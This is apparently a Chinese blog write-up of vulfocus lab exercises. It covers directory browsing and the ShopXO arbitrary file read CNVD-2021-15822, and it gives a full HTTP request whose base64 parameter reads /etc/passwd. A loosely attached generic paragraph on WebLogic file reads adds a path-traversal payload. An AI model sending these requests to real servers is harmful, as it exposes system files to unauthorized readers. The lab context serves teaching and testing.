【vulfocus复现】shopxo文件读取

入门

1.命令执行漏洞

QQ截图20211229174412

打开后命令执行一句话直接给出,复制粘贴即可

vulfocus01

2.目录浏览漏洞

描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。 风险:攻击者通过访问网站某一目录时,该目录没有默认首页文件或没有正确设置默认首页文件,将会把整个目录结构列出来,将网站结构完全暴露给攻击者; 攻击者可能通过浏览目录结构,访问到某些隐秘文件(如PHPINFO文件、服务器探针文件、网站管理员后台访问地址、数据库连接文件等)。

打开靶场后查看tmp/文件夹

QQ截图20211229180239

发现flag


初级

1.shopxo 文件读取(CNVD-2021-15822)
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: vulfocus.fofa.so:8282
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

通过burpsutie发送上面的漏洞请求,其中/url/xxx 中的xxx通过base64解码后为/etc/passwd

QQ截图20211229182459
复现参考PeiQi文库师傅的文章:
https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog

WebLogic服务器存在一些已知的安全漏洞,其中一个可能是由于文件包含或路径遍历功能的不当处理导致的文件读取漏洞。这种类型的漏洞通常出现在应用程序能够访问服务器文件系统的地方,比如通过动态内容生成、配置文件解析等。 要复现这个漏洞,攻击者可能会尝试发送恶意请求给WebLogic应用,包含特定的文件名或路径参数,试图读取到不应公开的敏感信息,如配置文件、私密数据或日志文件。通常步骤包括: 1. **分析漏洞利用文档**:查找相关的漏洞描述、CVE编号以及具体的payload示例,例如CVE-2021-25566就是一种WebLogic文件读取漏洞的实例。 2. **构造请求**:利用web服务提供的API或入口点,创建一个HTTP或HTTPS请求,包含能触发漏洞的URL参数,比如`/path/to/sensitive/file?filename=../../../../etc/passwd`。 3. **测试环境设置**:确保你的测试环境是安全的,并将目标WebLogic服务器置于监听模式下,以便接收并响应请求。 4. **发送请求**:使用工具如Burp Suite、Postman或curl发送包含恶意参数的请求,然后观察服务器的响应。如果能看到预期的文件内容,就说明漏洞可能已被成功利用。 请注意,复现漏洞是为了教育目的,实际环境中绝对不能用于未经授权的数据获取,这违反了网络安全原则。修复这类漏洞通常是更新WebLogic到最新版本,或者采用安全配置来限制文件系统的访问权限。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值